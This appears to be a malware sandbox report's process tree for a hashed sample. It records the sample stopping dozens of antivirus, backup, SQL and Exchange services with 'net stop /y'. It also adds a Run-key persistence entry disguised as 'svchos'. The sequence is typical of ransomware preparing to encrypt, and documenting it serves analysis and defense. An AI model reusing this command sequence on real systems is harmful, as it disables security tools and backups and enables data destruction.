C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop RESvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RESvc /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop sacsvr /y2⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SamSs /y2⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SAVAdminService /y2⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SAVService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVService /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SDRSVC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SDRSVC /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ShMonitor /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ShMonitor /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop sophossps /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophossps /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SepMasterService /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$BKUPEXEC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$ECWDB2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEBGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SntpService /y2⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SNAC /y2⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEMGT /y2⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SMTPSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SmcService /y2⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SBSMONITORING /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$PROFXENGAGEMENT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SHAREPOINT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop Smcinst /y2⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SYSTEM_BGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$TPS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SamSs /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2012 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLBrowser /y2⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SQL_2008 /y2⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SepMasterService /y2⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLSafeOLRService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLSERVERAGENT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLTELEMETRY /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLTELEMETRY$ECWDB2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLWriter /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SstpSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SstpSvc /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop svcGenericHost /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop swi_filter /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_filter /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop swi_service /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_service /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop swi_update_64 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop TmCCSF /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TmCCSF /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop tmlisten /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop tmlisten /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop TrueKey /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKey /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop TrueKeyServiceHelper /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop UI0Detect /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop UI0Detect /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop TrueKeyScheduler /y2⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamBackupSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamBrokerSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamCatalogSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamCloudSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamDeploymentService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamDeploySvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamEnterpriseManagerSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamMountSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamNFSSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamRESTSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamTransportSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop W3Svc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop W3Svc /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop wbengine /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop WRSVC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WRSVC /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamHvIntegrationSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop swi_update /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$CXDB /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$CITRIX_METAFRAME /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "SQL Backups" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQL Backups" /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$PROD /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Zoolz 2 Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Zoolz 2 Service" /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLServerADHelper /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$PROD /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop msftesql$PROD /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop NetMsmqActivator /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EhttpSrv /y2⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ekrn /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ekrn /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ESHASRV /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ESHASRV /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SOPHOS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop AVP /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AVP /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SQLEXPRESS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop wbengine /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop kavfsslp /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop kavfsslp /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop KAVFSGT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop KAVFS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFS /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop mfefire /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfefire /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SQLEXPRESS /y2⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop klnagent /y2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\113af75f13547be184822f1268f984b79f35965a1b1f963d23b50a09741b0aec.sample.exe" /f2⤵
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\113af75f13547be184822f1268f984b79f35965a1b1f963d23b50a09741b0aec.sample.exe" /f3⤵
- Adds Run key to start application
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SOPHOS /y2⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1289148409-8823886144762744699525318437704149962026374126-134476027-1287920509"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2093589909-198829005-13973669402105331488-489688702-17773588121354080576-317472567"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-5429573452532747542137210542-2037232243-890784607-1652688971-42820931258002409"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-492212424774517473-2454170291006766564257508145-376875604-218525444-1140517752"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1283956594605190476-1760969495-128294049-1664534222-112226299610848903527439779"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "342082945-10503268911639449426206660128116590877166278738713258945911550206959"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-9211399371317589954-164700329-81113052-1405302024-9430511082231319811615380333"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1404140246-1039326757-2144625401-1858129629168235970319874461745527527081592485108"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "4087383644380196-1289986990-1692144762866451510-1444769877-2050049189134829480"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-12210853051305108179-237369030-4294088231050619239-1212687173-8871700501146008866"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2045085085605880921-894464536400096539-209846788190059040790714040-1365391299"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-983036731116561895220886481871640950594-17410903821685053994154203818-330082956"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-122450277-27070957920349804591511766137654381484282201829-305364667-1454526675"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1158901232-1632890472-7007414851415867444-1178808936-50301628615775508271413730432"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DCAgent /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1707831622-141072749051783327170489289-19075143871287162673-271267585-6890095"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBAMService /y1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "41222263919755931581158727263-47131038383356008624212027-2121963806-376082272"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "425435392-1343184973-853335010-290093402-249361705-5870787841498356869-898094400"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2112686704-15772515021845780559-3919887045520108881162705411128788738597013131"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Smcinst /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SNAC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SntpService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sacsvr /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1777796396-8628730921201871951-1336299835770353760-13233858051607577137-1613114233"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-228728330-2712618931462903154-2134595857477236301474568264-1083274094996915853"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-21306475411773632767-118831628-870432162-16150604581973605706-1217949184-678761018"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "733933169136501236918025771256907759-18580324621625680006-5512780222028285202"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "88107305318874533071445852158446109972-1097723485-1932968655460843464-18755438"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1643298988-1006220612451356353847283624148617560517623124971842185971-2001384338"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-120010383-1561244266-1567252023-1278533601-785062210-693416343-1416940963-939469623"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "821437140207936170-9330840812719492539285828247915694167861449-1461467025"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "372468230-2115154738-2129773806198414384181634584210885095512183116071381350210"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1683052247-2131311559141962052394207344-1257629187-1341090570-340373876-673231688"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-10074155542035976225-441739486-146437799-1788011575-254982135-1267266805-1012840726"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "44866005-516462097-57815903-676754615824401890-1411874752-238108368-282985162"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "299285174-18114986972075855260-132513822-323509708506585580326466126-1629180668"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1322223007738614037-3280832942263030381565108285-99815221579433384-1165200827"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop klnagent /y1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "154949882-1410569178-639478671-113788936719261395437923773222078644-830207620"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "444451366350695264-102957633-896215540-870766225-168340026456155476-557738559"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-994399196-1461436604-1644691758995304489-1561754009438009554953143346-728616726"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2002057098-1799862788-170946368112764858501551486445-70459899632773463028780580"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "12276696116485094-1857943442-20572462331350198326-20594967021665253305-888609950"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1217817949-6400845802117243016-144967650817908711811664994480983488730-527226167"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1041889319-562974101-587873321-73985943084323884-878901446-526222610-1243070907"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/296-73-0x0000000000000000-mapping.dmp
-
memory/328-67-0x0000000000000000-mapping.dmp
-
memory/460-79-0x0000000000000000-mapping.dmp
-
memory/628-70-0x0000000000000000-mapping.dmp
-
memory/792-74-0x0000000000000000-mapping.dmp
-
memory/796-75-0x0000000000000000-mapping.dmp
-
memory/1120-69-0x0000000000000000-mapping.dmp
-
memory/1124-125-0x000000013FD70000-0x000000013FDA5000-memory.dmpFilesize
212KB
-
memory/1224-66-0x0000000000000000-mapping.dmp
-
memory/1268-76-0x0000000000000000-mapping.dmp
-
memory/1368-64-0x0000000000000000-mapping.dmp
-
memory/1524-68-0x0000000000000000-mapping.dmp
-
memory/1532-77-0x0000000000000000-mapping.dmp
-
memory/1608-65-0x0000000000000000-mapping.dmp
-
memory/1644-71-0x0000000000000000-mapping.dmp
-
memory/1664-78-0x0000000000000000-mapping.dmp
-
memory/1676-72-0x0000000000000000-mapping.dmp
-
memory/1692-63-0x0000000000000000-mapping.dmp
-
memory/1724-61-0x0000000000000000-mapping.dmp
-
memory/1792-62-0x0000000000000000-mapping.dmp
-
memory/1916-60-0x000007FEFBC41000-0x000007FEFBC43000-memory.dmpFilesize
8KB
-
memory/2076-80-0x0000000000000000-mapping.dmp
-
memory/2116-102-0x0000000000000000-mapping.dmp
-
memory/2120-81-0x0000000000000000-mapping.dmp
-
memory/2180-82-0x0000000000000000-mapping.dmp
-
memory/2212-83-0x0000000000000000-mapping.dmp
-
memory/2240-98-0x0000000000000000-mapping.dmp
-
memory/2268-84-0x0000000000000000-mapping.dmp
-
memory/2340-85-0x0000000000000000-mapping.dmp
-
memory/2408-86-0x0000000000000000-mapping.dmp
-
memory/2436-99-0x0000000000000000-mapping.dmp
-
memory/2452-87-0x0000000000000000-mapping.dmp
-
memory/2508-88-0x0000000000000000-mapping.dmp
-
memory/2568-89-0x0000000000000000-mapping.dmp
-
memory/2584-100-0x0000000000000000-mapping.dmp
-
memory/2604-90-0x0000000000000000-mapping.dmp
-
memory/2652-103-0x0000000000000000-mapping.dmp
-
memory/2660-91-0x0000000000000000-mapping.dmp
-
memory/2744-92-0x0000000000000000-mapping.dmp
-
memory/2832-93-0x0000000000000000-mapping.dmp
-
memory/2840-101-0x0000000000000000-mapping.dmp
-
memory/2888-94-0x0000000000000000-mapping.dmp
-
memory/2972-95-0x0000000000000000-mapping.dmp
-
memory/3016-96-0x0000000000000000-mapping.dmp
-
memory/3064-97-0x0000000000000000-mapping.dmp
-
memory/3116-104-0x0000000000000000-mapping.dmp
-
memory/3172-105-0x0000000000000000-mapping.dmp
-
memory/3188-106-0x0000000000000000-mapping.dmp
-
memory/3244-107-0x0000000000000000-mapping.dmp
-
memory/3264-108-0x0000000000000000-mapping.dmp
-
memory/3292-109-0x0000000000000000-mapping.dmp
-
memory/3316-110-0x0000000000000000-mapping.dmp
-
memory/3352-111-0x0000000000000000-mapping.dmp
-
memory/3384-112-0x0000000000000000-mapping.dmp
-
memory/3428-113-0x0000000000000000-mapping.dmp
-
memory/3440-114-0x0000000000000000-mapping.dmp
-
memory/3456-115-0x0000000000000000-mapping.dmp
-
memory/3472-116-0x0000000000000000-mapping.dmp
-
memory/3492-117-0x0000000000000000-mapping.dmp
-
memory/3520-118-0x0000000000000000-mapping.dmp
-
memory/3532-119-0x0000000000000000-mapping.dmp
-
memory/3572-120-0x0000000000000000-mapping.dmp
-
memory/3584-121-0x0000000000000000-mapping.dmp
-
memory/3604-122-0x0000000000000000-mapping.dmp
-
memory/3632-123-0x0000000000000000-mapping.dmp
-
memory/3652-124-0x0000000000000000-mapping.dmp